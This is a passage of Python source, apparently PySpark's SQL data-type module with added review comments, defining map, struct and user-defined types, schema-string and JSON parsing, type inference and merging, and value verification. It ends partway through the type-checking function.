    def simpleString(self):
        # SQL-style name, e.g. "map<string,int>".
        return 'map<%s,%s>' % (self.keyType.simpleString(), self.valueType.simpleString())

    def __repr__(self):
        return "MapType(%s,%s,%s)" % (self.keyType, self.valueType,
                                      str(self.valueContainsNull).lower())

    def jsonValue(self):
        return {"type": self.typeName(),
                "keyType": self.keyType.jsonValue(),
                "valueType": self.valueType.jsonValue(),
                "valueContainsNull": self.valueContainsNull}

    @classmethod
    def fromJson(cls, json):
        return MapType(_parse_datatype_json_value(json["keyType"]),
                       _parse_datatype_json_value(json["valueType"]),
                       json["valueContainsNull"])

    def needConversion(self):
        # Conversion is needed when either the key or the value type needs it.
        return self.keyType.needConversion() or self.valueType.needConversion()

    def toInternal(self, obj):
        if self.needConversion():
            # ``obj and ...`` passes None (or any falsy obj) through unchanged.
            return obj and dict((self.keyType.toInternal(key), self.valueType.toInternal(value))
                                for key, value in obj.items())
        return obj

    def fromInternal(self, obj):
        if self.needConversion():
            return obj and dict((self.keyType.fromInternal(key), self.valueType.fromInternal(value))
                                for key, value in obj.items())
        return obj
class StructField(DataType):
    """A field in :class:`StructType`.

    :param name: string, name of the field.
    :param dataType: :class:`DataType` of the field.
    :param nullable: boolean, whether the field can be null (None) or not.
    :param metadata: a dict from string to simple type that can be toInternald to JSON automatically
    """
    def __init__(self, name, dataType, nullable=True, metadata=None):
        """
        >>> (StructField("f1", StringType(), True)
        ...  == StructField("f1", StringType(), True))
        True
        >>> (StructField("f1", StringType(), True)
        ...  == StructField("f2", StringType(), True))
        False
        """
        assert isinstance(dataType, DataType), "dataType should be DataType"
        # `basestring` is presumably aliased for Python 3 earlier in this
        # module (common compat shim) — confirm.
        assert isinstance(name, basestring), "field name should be string"
        if not isinstance(name, str):
            # Python 2: a unicode name is normalized to a utf-8 byte string.
            name = name.encode('utf-8')
        self.name = name
        self.dataType = dataType
        self.nullable = nullable
        self.metadata = metadata or {}
    def simpleString(self):
        # e.g. "f1:int"
        return '%s:%s' % (self.name, self.dataType.simpleString())
    def __repr__(self):
        return "StructField(%s,%s,%s)" % (self.name, self.dataType,
                                          str(self.nullable).lower())
    def jsonValue(self):
        return {"name": self.name,
                "type": self.dataType.jsonValue(),
                "nullable": self.nullable,
                "metadata": self.metadata}
    @classmethod
    def fromJson(cls, json):
        return StructField(json["name"],
                           _parse_datatype_json_value(json["type"]),
                           json["nullable"],
                           json["metadata"])
    def needConversion(self):
        # Delegates entirely to the field's data type.
        return self.dataType.needConversion()
    def toInternal(self, obj):
        return self.dataType.toInternal(obj)
    def fromInternal(self, obj):
        return self.dataType.fromInternal(obj)
class StructType(DataType):
    """Struct type, consisting of a list of :class:`StructField`.

    This is the data type representing a :class:`Row`.
    Iterating a :class:`StructType` will iterate its :class:`StructField`s.
    A contained :class:`StructField` can be accessed by name or position.

    >>> struct1 = StructType([StructField("f1", StringType(), True)])
    >>> struct1["f1"]
    StructField(f1,StringType,true)
    >>> struct1[0]
    StructField(f1,StringType,true)
    """
    def __init__(self, fields=None):
        """
        >>> struct1 = StructType([StructField("f1", StringType(), True)])
        >>> struct2 = StructType([StructField("f1", StringType(), True)])
        >>> struct1 == struct2
        True
        >>> struct1 = StructType([StructField("f1", StringType(), True)])
        >>> struct2 = StructType([StructField("f1", StringType(), True),
        ...     StructField("f2", IntegerType(), False)])
        >>> struct1 == struct2
        False
        """
        if not fields:
            self.fields = []
            self.names = []
        else:
            self.fields = fields
            self.names = [f.name for f in fields]
            assert all(isinstance(f, StructField) for f in fields),\
                "fields should be a list of StructField"
        # Precomputed: whether any field needs Python<->internal conversion.
        self._needSerializeAnyField = any(f.needConversion() for f in self)
    def add(self, field, data_type=None, nullable=True, metadata=None):
        """
        Construct a StructType by adding new elements to it to define the schema. The method accepts
        either:

        a) A single parameter which is a StructField object.
        b) Between 2 and 4 parameters as (name, data_type, nullable (optional),
           metadata(optional). The data_type parameter may be either a String or a
           DataType object.

        >>> struct1 = StructType().add("f1", StringType(), True).add("f2", StringType(), True, None)
        >>> struct2 = StructType([StructField("f1", StringType(), True), \\
        ...     StructField("f2", StringType(), True, None)])
        >>> struct1 == struct2
        True
        >>> struct1 = StructType().add(StructField("f1", StringType(), True))
        >>> struct2 = StructType([StructField("f1", StringType(), True)])
        >>> struct1 == struct2
        True
        >>> struct1 = StructType().add("f1", "string", True)
        >>> struct2 = StructType([StructField("f1", StringType(), True)])
        >>> struct1 == struct2
        True

        :param field: Either the name of the field or a StructField object
        :param data_type: If present, the DataType of the StructField to create
        :param nullable: Whether the field to add should be nullable (default True)
        :param metadata: Any additional metadata (default None)
        :return: a new updated StructType

        .. note:: mutates and returns ``self`` (not a copy).
        """
        if isinstance(field, StructField):
            self.fields.append(field)
            self.names.append(field.name)
        else:
            if isinstance(field, str) and data_type is None:
                raise ValueError("Must specify DataType if passing name of struct_field to create.")
            if isinstance(data_type, str):
                # NOTE(review): a string data_type goes through the JSON-value
                # parser, so only atomic names like "string" work here — confirm.
                data_type_f = _parse_datatype_json_value(data_type)
            else:
                data_type_f = data_type
            self.fields.append(StructField(field, data_type_f, nullable, metadata))
            self.names.append(field)
        # Keep the cached conversion flag in sync with the new field list.
        self._needSerializeAnyField = any(f.needConversion() for f in self)
        return self
    def __iter__(self):
        """Iterate the fields"""
        return iter(self.fields)
    def __len__(self):
        """Return the number of fields."""
        return len(self.fields)
    def __getitem__(self, key):
        """Access fields by name or slice."""
        if isinstance(key, str):
            for field in self:
                if field.name == key:
                    return field
            raise KeyError('No StructField named {0}'.format(key))
        elif isinstance(key, int):
            try:
                return self.fields[key]
            except IndexError:
                raise IndexError('StructType index out of range')
        elif isinstance(key, slice):
            return StructType(self.fields[key])
        else:
            raise TypeError('StructType keys should be strings, integers or slices')
    def simpleString(self):
        # e.g. "struct<a:int,b:string>"
        return 'struct<%s>' % (','.join(f.simpleString() for f in self))
    def __repr__(self):
        return ("StructType(List(%s))" %
                ",".join(str(field) for field in self))
    def jsonValue(self):
        return {"type": self.typeName(),
                "fields": [f.jsonValue() for f in self]}
    @classmethod
    def fromJson(cls, json):
        return StructType([StructField.fromJson(f) for f in json["fields"]])
    def needConversion(self):
        # We need convert Row()/namedtuple into tuple()
        return True
    def toInternal(self, obj):
        # Convert a dict/Row/tuple/object into the internal tuple form,
        # recursively converting field values only when some field needs it.
        if obj is None:
            return
        if self._needSerializeAnyField:
            if isinstance(obj, dict):
                return tuple(f.toInternal(obj.get(n)) for n, f in zip(self.names, self.fields))
            elif isinstance(obj, (tuple, list)):
                return tuple(f.toInternal(v) for f, v in zip(self.fields, obj))
            elif hasattr(obj, "__dict__"):
                d = obj.__dict__
                return tuple(f.toInternal(d.get(n)) for n, f in zip(self.names, self.fields))
            else:
                raise ValueError("Unexpected tuple %r with StructType" % obj)
        else:
            if isinstance(obj, dict):
                return tuple(obj.get(n) for n in self.names)
            elif isinstance(obj, Row) and getattr(obj, "__from_dict__", False):
                # Rows built from kwargs store fields sorted by name, so
                # re-order by this struct's field names.
                return tuple(obj[n] for n in self.names)
            elif isinstance(obj, (list, tuple)):
                return tuple(obj)
            elif hasattr(obj, "__dict__"):
                d = obj.__dict__
                return tuple(d.get(n) for n in self.names)
            else:
                raise ValueError("Unexpected tuple %r with StructType" % obj)
    def fromInternal(self, obj):
        # Convert an internal tuple back into a Row.
        if obj is None:
            return
        if isinstance(obj, Row):
            # it's already converted by pickler
            return obj
        if self._needSerializeAnyField:
            values = [f.fromInternal(v) for f, v in zip(self.fields, obj)]
        else:
            values = obj
        return _create_row(self.names, values)
class UserDefinedType(DataType):
    """User-defined type (UDT).

    .. note:: WARN: Spark Internal Use Only
    """
    @classmethod
    def typeName(cls):
        return cls.__name__.lower()
    @classmethod
    def sqlType(cls):
        """
        Underlying SQL storage type for this UDT.
        """
        raise NotImplementedError("UDT must implement sqlType().")
    @classmethod
    def module(cls):
        """
        The Python module of the UDT.
        """
        raise NotImplementedError("UDT must implement module().")
    @classmethod
    def scalaUDT(cls):
        """
        The class name of the paired Scala UDT (could be '', if there
        is no corresponding one).
        """
        return ''
    def needConversion(self):
        # UDT values always go through serialize/deserialize.
        return True
    @classmethod
    def _cachedSqlType(cls):
        """
        Cache the sqlType() into class, because it's heavy used in `toInternal`.
        """
        if not hasattr(cls, "_cached_sql_type"):
            cls._cached_sql_type = cls.sqlType()
        return cls._cached_sql_type
    def toInternal(self, obj):
        # None maps to None (implicit return).
        if obj is not None:
            return self._cachedSqlType().toInternal(self.serialize(obj))
    def fromInternal(self, obj):
        v = self._cachedSqlType().fromInternal(obj)
        if v is not None:
            return self.deserialize(v)
    def serialize(self, obj):
        """
        Converts the a user-type object into a SQL datum.
        """
        raise NotImplementedError("UDT must implement toInternal().")
    def deserialize(self, datum):
        """
        Converts a SQL datum into a user-type object.
        """
        raise NotImplementedError("UDT must implement fromInternal().")
    def simpleString(self):
        return 'udt'
    def json(self):
        return json.dumps(self.jsonValue(), separators=(',', ':'), sort_keys=True)
    def jsonValue(self):
        if self.scalaUDT():
            assert self.module() != '__main__', 'UDT in __main__ cannot work with ScalaUDT'
            schema = {
                "type": "udt",
                "class": self.scalaUDT(),
                "pyClass": "%s.%s" % (self.module(), type(self).__name__),
                "sqlType": self.sqlType().jsonValue()
            }
        else:
            # No Scala counterpart: ship the pickled Python class itself.
            ser = CloudPickleSerializer()
            b = ser.dumps(type(self))
            schema = {
                "type": "udt",
                "pyClass": "%s.%s" % (self.module(), type(self).__name__),
                "serializedClass": base64.b64encode(b).decode('utf8'),
                "sqlType": self.sqlType().jsonValue()
            }
        return schema
    @classmethod
    def fromJson(cls, json):
        pyUDT = str(json["pyClass"])  # convert unicode to str
        split = pyUDT.rfind(".")
        pyModule = pyUDT[:split]
        pyClass = pyUDT[split+1:]
        m = __import__(pyModule, globals(), locals(), [pyClass])
        if not hasattr(m, pyClass):
            # Fall back to the pickled class carried in the JSON schema.
            s = base64.b64decode(json['serializedClass'].encode('utf-8'))
            UDT = CloudPickleSerializer().loads(s)
        else:
            UDT = getattr(m, pyClass)
        return UDT()
    def __eq__(self, other):
        # UDTs compare equal by class identity only.
        return type(self) == type(other)
# All primitive (non-nested) types, keyed below by their typeName().
_atomic_types = [StringType, BinaryType, BooleanType, DecimalType, FloatType, DoubleType,
                 ByteType, ShortType, IntegerType, LongType, DateType, TimestampType, NullType]
_all_atomic_types = dict((t.typeName(), t) for t in _atomic_types)
# Nested container types, keyed by typeName(); each provides fromJson().
_all_complex_types = dict((v.typeName(), v)
                          for v in [ArrayType, MapType, StructType])
# Matches e.g. "decimal(10, 2)", capturing precision and scale.
_FIXED_DECIMAL = re.compile("decimal\\(\\s*(\\d+)\\s*,\\s*(\\d+)\\s*\\)")
# Opening bracket -> matching closing bracket, used by the schema parsers.
# NOTE(review): '<'/'>' are not tracked here, so a comma inside e.g.
# "map<k,v>" nested within a struct string is not protected — confirm intended.
_BRACKETS = {'(': ')', '[': ']', '{': '}'}
def _parse_basic_datatype_string(s):
    """Convert an atomic type name (e.g. "byte", "decimal(16,8)") to a DataType."""
    if s in _all_atomic_types:
        return _all_atomic_types[s]()
    if s == "int":
        # "int" is accepted as a shorthand for "integer".
        return IntegerType()
    decimal_match = _FIXED_DECIMAL.match(s)
    if decimal_match:
        precision, scale = decimal_match.groups()
        return DecimalType(int(precision), int(scale))
    raise ValueError("Could not parse datatype: %s" % s)
def _ignore_brackets_split(s, separator):
    """
    Splits the given string by given separator, but ignore separators inside brackets pairs, e.g.
    given "a,b" and separator ",", it will return ["a", "b"], but given "a(b,c), d", it will return
    ["a(b,c)", "d"].
    """
    parts = []
    current = ""
    depth = 0  # how many unclosed brackets we are inside of
    for ch in s:
        if ch in _BRACKETS:
            depth += 1
            current += ch
        elif ch in _BRACKETS.values():
            if depth == 0:
                raise ValueError("Brackets are not correctly paired: %s" % s)
            depth -= 1
            current += ch
        elif ch == separator and depth > 0:
            # Separator inside brackets is part of the token.
            current += ch
        elif ch == separator:
            parts.append(current)
            current = ""
        else:
            current += ch
    if not current:
        # A trailing separator (or an empty input) leaves nothing to append.
        raise ValueError("The %s cannot be the last char: %s" % (separator, s))
    parts.append(current)
    return parts
def _parse_struct_fields_string(s):
    """Parse a comma-separated list of "name:type" pairs into a :class:`StructType`.

    :param s: string such as "a:int,b:string"; whitespace around names is stripped.
    :raise ValueError: if any comma-separated part is not 'field_name:field_type'.
    """
    parts = _ignore_brackets_split(s, ",")
    fields = []
    for part in parts:
        name_and_type = _ignore_brackets_split(part, ":")
        if len(name_and_type) != 2:
            # Fixed typo in the error message ("strcut" -> "struct").
            raise ValueError("The struct field string format is: 'field_name:field_type', " +
                             "but got: %s" % part)
        field_name = name_and_type[0].strip()
        field_type = _parse_datatype_string(name_and_type[1])
        fields.append(StructField(field_name, field_type))
    return StructType(fields)
def _parse_datatype_string(s):
    """
    Parses the given data type string to a :class:`DataType`. The data type string format equals
    to :class:`DataType.simpleString`, except that top level struct type can omit
    the ``struct<>`` and atomic types use ``typeName()`` as their format, e.g. use ``byte`` instead
    of ``tinyint`` for :class:`ByteType`. We can also use ``int`` as a short name
    for :class:`IntegerType`.

    >>> _parse_datatype_string("int ")
    IntegerType
    >>> _parse_datatype_string("a: byte, b: decimal(  16 , 8   ) ")
    StructType(List(StructField(a,ByteType,true),StructField(b,DecimalType(16,8),true)))
    >>> _parse_datatype_string("a: array< short>")
    StructType(List(StructField(a,ArrayType(ShortType,true),true)))
    >>> _parse_datatype_string(" map<string , string > ")
    MapType(StringType,StringType,true)

    >>> # Error cases
    >>> _parse_datatype_string("blabla") # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    ValueError:...
    >>> _parse_datatype_string("a: int,") # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    ValueError:...
    >>> _parse_datatype_string("array<int") # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    ValueError:...
    >>> _parse_datatype_string("map<int, boolean>>") # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    ValueError:...
    """
    s = s.strip()
    if s.startswith("array<"):
        if s[-1] != ">":
            raise ValueError("'>' should be the last char, but got: %s" % s)
        # Element type is everything between "array<" and the final ">".
        return ArrayType(_parse_datatype_string(s[6:-1]))
    elif s.startswith("map<"):
        if s[-1] != ">":
            raise ValueError("'>' should be the last char, but got: %s" % s)
        parts = _ignore_brackets_split(s[4:-1], ",")
        if len(parts) != 2:
            raise ValueError("The map type string format is: 'map<key_type,value_type>', " +
                             "but got: %s" % s)
        kt = _parse_datatype_string(parts[0])
        vt = _parse_datatype_string(parts[1])
        return MapType(kt, vt)
    elif s.startswith("struct<"):
        if s[-1] != ">":
            raise ValueError("'>' should be the last char, but got: %s" % s)
        return _parse_struct_fields_string(s[7:-1])
    elif ":" in s:
        # A bare "name:type, ..." list is treated as a top-level struct.
        return _parse_struct_fields_string(s)
    else:
        return _parse_basic_datatype_string(s)
def _parse_datatype_json_string(json_string):
    """Parses the given data type JSON string (as produced by ``DataType.json()``).

    >>> import pickle
    >>> def check_datatype(datatype):
    ...     pickled = pickle.loads(pickle.dumps(datatype))
    ...     assert datatype == pickled
    ...     scala_datatype = spark._jsparkSession.parseDataType(datatype.json())
    ...     python_datatype = _parse_datatype_json_string(scala_datatype.json())
    ...     assert datatype == python_datatype
    >>> for cls in _all_atomic_types.values():
    ...     check_datatype(cls())

    >>> # Simple ArrayType.
    >>> simple_arraytype = ArrayType(StringType(), True)
    >>> check_datatype(simple_arraytype)

    >>> # Simple MapType.
    >>> simple_maptype = MapType(StringType(), LongType())
    >>> check_datatype(simple_maptype)

    >>> # Simple StructType.
    >>> simple_structtype = StructType([
    ...     StructField("a", DecimalType(), False),
    ...     StructField("b", BooleanType(), True),
    ...     StructField("c", LongType(), True),
    ...     StructField("d", BinaryType(), False)])
    >>> check_datatype(simple_structtype)

    >>> # Complex StructType.
    >>> complex_structtype = StructType([
    ...     StructField("simpleArray", simple_arraytype, True),
    ...     StructField("simpleMap", simple_maptype, True),
    ...     StructField("simpleStruct", simple_structtype, True),
    ...     StructField("boolean", BooleanType(), False),
    ...     StructField("withMeta", DoubleType(), False, {"name": "age"})])
    >>> check_datatype(complex_structtype)

    >>> # Complex ArrayType.
    >>> complex_arraytype = ArrayType(complex_structtype, True)
    >>> check_datatype(complex_arraytype)

    >>> # Complex MapType.
    >>> complex_maptype = MapType(complex_structtype,
    ...                           complex_arraytype, False)
    >>> check_datatype(complex_maptype)
    """
    return _parse_datatype_json_value(json.loads(json_string))
def _parse_datatype_json_value(json_value):
    """Convert a JSON-decoded value (a type-name string or a dict) to a DataType."""
    if isinstance(json_value, dict):
        # Complex types and UDTs are described by a dict with a "type" key.
        tpe = json_value["type"]
        if tpe in _all_complex_types:
            return _all_complex_types[tpe].fromJson(json_value)
        if tpe == 'udt':
            return UserDefinedType.fromJson(json_value)
        raise ValueError("not supported type: %s" % tpe)
    # Otherwise it is a bare atomic type name.
    if json_value in _all_atomic_types:
        return _all_atomic_types[json_value]()
    if json_value == 'decimal':
        return DecimalType()
    fixed = _FIXED_DECIMAL.match(json_value)
    if fixed:
        return DecimalType(int(fixed.group(1)), int(fixed.group(2)))
    raise ValueError("Could not parse datatype: %s" % json_value)
# Mapping Python types to Spark SQL DataType
_type_mappings = {
    type(None): NullType,
    bool: BooleanType,
    int: LongType,
    float: DoubleType,
    str: StringType,
    bytearray: BinaryType,
    decimal.Decimal: DecimalType,
    datetime.date: DateType,
    datetime.datetime: TimestampType,
    # datetime.time also maps to TimestampType (there is no time-only type).
    datetime.time: TimestampType,
}
if sys.version < "3":
    # Python 2 only: `unicode` and `long` are distinct builtin types there.
    _type_mappings.update({
        unicode: StringType,
        long: LongType,
    })
def _infer_type(obj):
    """Infer the Spark SQL DataType from a Python object.

    :param obj: any Python value (None, builtin scalar, dict, list/array,
        UDT-tagged object, or an object/namedtuple treated as a struct).
    :return: a :class:`DataType` instance.
    :raise TypeError: if no mapping exists for ``type(obj)``.
    """
    if obj is None:
        return NullType()
    if hasattr(obj, '__UDT__'):
        # Objects tagged with a UDT carry their own type.
        return obj.__UDT__
    dataType = _type_mappings.get(type(obj))
    if dataType is DecimalType:
        # the precision and scale of `obj` may be different from row to row.
        return DecimalType(38, 18)
    elif dataType is not None:
        return dataType()
    if isinstance(obj, dict):
        # Use the first entry with both key and value non-None.
        for key, value in obj.items():
            if key is not None and value is not None:
                return MapType(_infer_type(key), _infer_type(value), True)
        else:
            return MapType(NullType(), NullType(), True)
    elif isinstance(obj, (list, array)):
        for v in obj:
            if v is not None:
                # Bug fix: infer from the first non-None element `v`; the old
                # code used obj[0], which could itself be None and wrongly
                # yield ArrayType(NullType) for e.g. [None, 1].
                return ArrayType(_infer_type(v), True)
        else:
            return ArrayType(NullType(), True)
    else:
        try:
            return _infer_schema(obj)
        except TypeError:
            raise TypeError("not supported type: %s" % type(obj))
def _infer_schema(row):
    """Infer the schema from dict/namedtuple/object"""
    if isinstance(row, dict):
        # Dict keys are sorted so the schema is deterministic.
        kv_pairs = sorted(row.items())
    elif isinstance(row, (tuple, list)):
        if hasattr(row, "__fields__"):  # Row
            kv_pairs = zip(row.__fields__, tuple(row))
        elif hasattr(row, "_fields"):  # namedtuple
            kv_pairs = zip(row._fields, tuple(row))
        else:
            # Plain sequence: synthesize positional names _1, _2, ...
            generated = ['_%d' % i for i in range(1, len(row) + 1)]
            kv_pairs = zip(generated, row)
    elif hasattr(row, "__dict__"):  # object
        kv_pairs = sorted(row.__dict__.items())
    else:
        raise TypeError("Can not infer schema for type: %s" % type(row))
    return StructType([StructField(name, _infer_type(value), True)
                       for name, value in kv_pairs])
def _has_nulltype(dt):
    """ Return whether there is NullType in `dt` or not """
    if isinstance(dt, StructType):
        return any(_has_nulltype(field.dataType) for field in dt.fields)
    if isinstance(dt, ArrayType):
        return _has_nulltype(dt.elementType)
    if isinstance(dt, MapType):
        return _has_nulltype(dt.keyType) or _has_nulltype(dt.valueType)
    return isinstance(dt, NullType)
def _merge_type(a, b):
    """Merge two DataTypes into one compatible type.

    NullType acts as the identity element; otherwise both sides must be
    instances of the same DataType class.  Structs are merged field-by-field;
    a field present on only one side is merged against NullType (and kept).

    :raise TypeError: if `a` and `b` are different non-null types.
    """
    if isinstance(a, NullType):
        return b
    elif isinstance(b, NullType):
        return a
    elif type(a) is not type(b):
        # TODO: type cast (such as int -> long)
        raise TypeError("Can not merge type %s and %s" % (type(a), type(b)))
    # same type
    if isinstance(a, StructType):
        nfs = dict((f.name, f.dataType) for f in b.fields)
        fields = [StructField(f.name, _merge_type(f.dataType, nfs.get(f.name, NullType())))
                  for f in a.fields]
        names = set([f.name for f in fields])
        # Append fields that exist only in `b`, preserving `a`'s order first.
        for n in nfs:
            if n not in names:
                fields.append(StructField(n, nfs[n]))
        return StructType(fields)
    elif isinstance(a, ArrayType):
        return ArrayType(_merge_type(a.elementType, b.elementType), True)
    elif isinstance(a, MapType):
        return MapType(_merge_type(a.keyType, b.keyType),
                       _merge_type(a.valueType, b.valueType),
                       True)
    else:
        return a
def _need_converter(dataType):
    """Return True when values of ``dataType`` require conversion by _create_converter."""
    if isinstance(dataType, (StructType, NullType)):
        # Structs are always flattened to tuples; NullType values become None.
        return True
    if isinstance(dataType, ArrayType):
        return _need_converter(dataType.elementType)
    if isinstance(dataType, MapType):
        return _need_converter(dataType.keyType) or _need_converter(dataType.valueType)
    return False
def _create_converter(dataType):
    """Create a converter to drop the names of fields in obj """
    if not _need_converter(dataType):
        # Identity: nothing nested needs converting.
        return lambda x: x
    if isinstance(dataType, ArrayType):
        conv = _create_converter(dataType.elementType)
        return lambda row: [conv(v) for v in row]
    elif isinstance(dataType, MapType):
        kconv = _create_converter(dataType.keyType)
        vconv = _create_converter(dataType.valueType)
        return lambda row: dict((kconv(k), vconv(v)) for k, v in row.items())
    elif isinstance(dataType, NullType):
        return lambda x: None
    elif not isinstance(dataType, StructType):
        return lambda x: x
    # dataType must be StructType
    names = [f.name for f in dataType.fields]
    converters = [_create_converter(f.dataType) for f in dataType.fields]
    convert_fields = any(_need_converter(f.dataType) for f in dataType.fields)
    def convert_struct(obj):
        # Flatten a dict/sequence/object into a tuple ordered by the schema.
        if obj is None:
            return
        if isinstance(obj, (tuple, list)):
            if convert_fields:
                return tuple(conv(v) for v, conv in zip(obj, converters))
            else:
                return tuple(obj)
        if isinstance(obj, dict):
            d = obj
        elif hasattr(obj, "__dict__"):  # object
            d = obj.__dict__
        else:
            raise TypeError("Unexpected obj type: %s" % type(obj))
        if convert_fields:
            return tuple([conv(d.get(name)) for name, conv in zip(names, converters)])
        else:
            return tuple([d.get(name) for name in names])
    return convert_struct
def _split_schema_abstract(s):
    """
    split the schema abstract into fields

    >>> _split_schema_abstract("a b  c")
    ['a', 'b', 'c']
    >>> _split_schema_abstract("a(a b)")
    ['a(a b)']
    >>> _split_schema_abstract("a b[] c{a b}")
    ['a', 'b[]', 'c{a b}']
    >>> _split_schema_abstract(" ")
    []
    """
    r = []
    w = ''
    brackets = []  # stack of currently-open brackets
    for c in s:
        if c == ' ' and not brackets:
            # Top-level space terminates the current field token.
            if w:
                r.append(w)
            w = ''
        else:
            w += c
            if c in _BRACKETS:
                brackets.append(c)
            elif c in _BRACKETS.values():
                # A closer must match the most recently opened bracket.
                if not brackets or c != _BRACKETS[brackets.pop()]:
                    raise ValueError("unexpected " + c)
    if brackets:
        raise ValueError("brackets not closed: %s" % brackets)
    if w:
        r.append(w)
    return r
def _parse_field_abstract(s):
    """
    Parse a field in schema abstract

    >>> _parse_field_abstract("a")
    StructField(a,NullType,true)
    >>> _parse_field_abstract("b(c d)")
    StructField(b,StructType(...c,NullType,true),StructField(d...
    >>> _parse_field_abstract("a[]")
    StructField(a,ArrayType(NullType,true),true)
    >>> _parse_field_abstract("a{[]}")
    StructField(a,MapType(NullType,ArrayType(NullType,true),true),true)
    """
    if set(_BRACKETS.keys()) & set(s):
        # Split at the first bracket: name before it, nested schema after.
        idx = min((s.index(c) for c in _BRACKETS if c in s))
        name = s[:idx]
        return StructField(name, _parse_schema_abstract(s[idx:]), True)
    else:
        # A bare name: the type is filled in later by _infer_schema_type.
        return StructField(s, NullType(), True)
def _parse_schema_abstract(s):
    """
    parse abstract into schema

    >>> _parse_schema_abstract("a b  c")
    StructType...a...b...c...
    >>> _parse_schema_abstract("a[b c] b{}")
    StructType...a,ArrayType...b...c...b,MapType...
    >>> _parse_schema_abstract("c{} d{a b}")
    StructType...c,MapType...d,MapType...a...b...
    >>> _parse_schema_abstract("a b(t)").fields[1]
    StructField(b,StructType(List(StructField(t,NullType,true))),true)
    """
    s = s.strip()
    # NOTE(review): the bracket branches assume the matching closer is the
    # last character of `s` (guaranteed by _split_schema_abstract) — confirm.
    if not s:
        return NullType()
    elif s.startswith('('):
        return _parse_schema_abstract(s[1:-1])
    elif s.startswith('['):
        return ArrayType(_parse_schema_abstract(s[1:-1]), True)
    elif s.startswith('{'):
        # Map key type is filled in later by _infer_schema_type.
        return MapType(NullType(), _parse_schema_abstract(s[1:-1]))
    parts = _split_schema_abstract(s)
    fields = [_parse_field_abstract(p) for p in parts]
    return StructType(fields)
def _infer_schema_type(obj, dataType):
    """
    Fill the dataType with types inferred from obj

    >>> schema = _parse_schema_abstract("a b c d")
    >>> row = (1, 1.0, "str", datetime.date(2014, 10, 10))
    >>> _infer_schema_type(row, schema)
    StructType...LongType...DoubleType...StringType...DateType...
    >>> row = [[1], {"key": (1, 2.0)}]
    >>> schema = _parse_schema_abstract("a[] b{c d}")
    >>> _infer_schema_type(row, schema)
    StructType...a,ArrayType...b,MapType(StringType,...c,LongType...
    """
    if isinstance(dataType, NullType):
        # Placeholder from the abstract parser: infer directly from the value.
        return _infer_type(obj)
    if not obj:
        # Empty/falsy value: nothing to infer from.
        return NullType()
    if isinstance(dataType, ArrayType):
        # Element type is inferred from the first element only.
        eType = _infer_schema_type(obj[0], dataType.elementType)
        return ArrayType(eType, True)
    elif isinstance(dataType, MapType):
        # Key/value types are inferred from an arbitrary entry.
        k, v = next(iter(obj.items()))
        return MapType(_infer_schema_type(k, dataType.keyType),
                       _infer_schema_type(v, dataType.valueType))
    elif isinstance(dataType, StructType):
        fs = dataType.fields
        assert len(fs) == len(obj), \
            "Obj(%s) have different length with fields(%s)" % (obj, fs)
        fields = [StructField(f.name, _infer_schema_type(o, f.dataType), True)
                  for o, f in zip(obj, fs)]
        return StructType(fields)
    else:
        raise TypeError("Unexpected dataType: %s" % type(dataType))
# Acceptable Python value types for each Spark SQL DataType; used by
# _verify_type for exact-type checks (subclasses are rejected).
# NOTE(review): `long` and `unicode` are Python 2 builtins; presumably they
# are aliased to int/str for Python 3 earlier in this module — confirm.
_acceptable_types = {
    BooleanType: (bool,),
    ByteType: (int, long),
    ShortType: (int, long),
    IntegerType: (int, long),
    LongType: (int, long),
    FloatType: (float,),
    DoubleType: (float,),
    DecimalType: (decimal.Decimal,),
    StringType: (str, unicode),
    BinaryType: (bytearray,),
    DateType: (datetime.date, datetime.datetime),
    TimestampType: (datetime.datetime,),
    ArrayType: (list, tuple, array),
    MapType: (dict,),
    StructType: (tuple, list, dict),
}
def _verify_type(obj, dataType, nullable=True):
    """
    Verify the type of obj against dataType, raise a TypeError if they do not match.

    Also verify the value of obj against datatype, raise a ValueError if it's not within the allowed
    range, e.g. using 128 as ByteType will overflow. Note that, Python float is not checked, so it
    will become infinity when cast to Java float if it overflows.

    >>> _verify_type(None, StructType([]))
    >>> _verify_type("", StringType())
    >>> _verify_type(0, LongType())
    >>> _verify_type(list(range(3)), ArrayType(ShortType()))
    >>> _verify_type(set(), ArrayType(StringType())) # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    TypeError:...
    >>> _verify_type({}, MapType(StringType(), IntegerType()))
    >>> _verify_type((), StructType([]))
    >>> _verify_type([], StructType([]))
    >>> _verify_type([1], StructType([])) # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    ValueError:...
    >>> # Check if numeric values are within the allowed range.
    >>> _verify_type(12, ByteType())
    >>> _verify_type(1234, ByteType()) # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    ValueError:...
    >>> _verify_type(None, ByteType(), False) # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    ValueError:...
    >>> _verify_type([1, None], ArrayType(ShortType(), False)) # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    ValueError:...
    >>> _verify_type({None: 1}, MapType(StringType(), IntegerType()))
    Traceback (most recent call last):
        ...
    ValueError:...
    >>> schema = StructType().add("a", IntegerType()).add("b", StringType(), False)
    >>> _verify_type((1, None), schema) # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    ValueError:...
    """
    if obj is None:
        if nullable:
            return
        else:
            raise ValueError("This field is not nullable, but got None")
    # StringType can work with any types
    if isinstance(dataType, StringType):
        return
    if isinstance(dataType, UserDefinedType):
        if not (hasattr(obj, '__UDT__') and obj.__UDT__ == dataType):
            raise ValueError("%r is not an instance of type %r" % (obj, dataType))
        # Verify the serialized form against the UDT's underlying SQL type.
        _verify_type(dataType.toInternal(obj), dataType.sqlType())
        return
    _type = type(dataType)
    assert _type in _acceptable_types, "unknown datatype: %s for object %r" % (dataType, obj)
    if _type is StructType:
        # check the type and fields later
        pass
    else:
        # subclass of them can not be fromInternal in JVM
        if type(obj) not in _acceptable_types[_type]:
            raise TypeError("%s can not accept object %r in type %s" % (dataType, obj, type(obj)))
    if isinstance(dataType, ByteType):
        if obj < -128 or obj > 127:
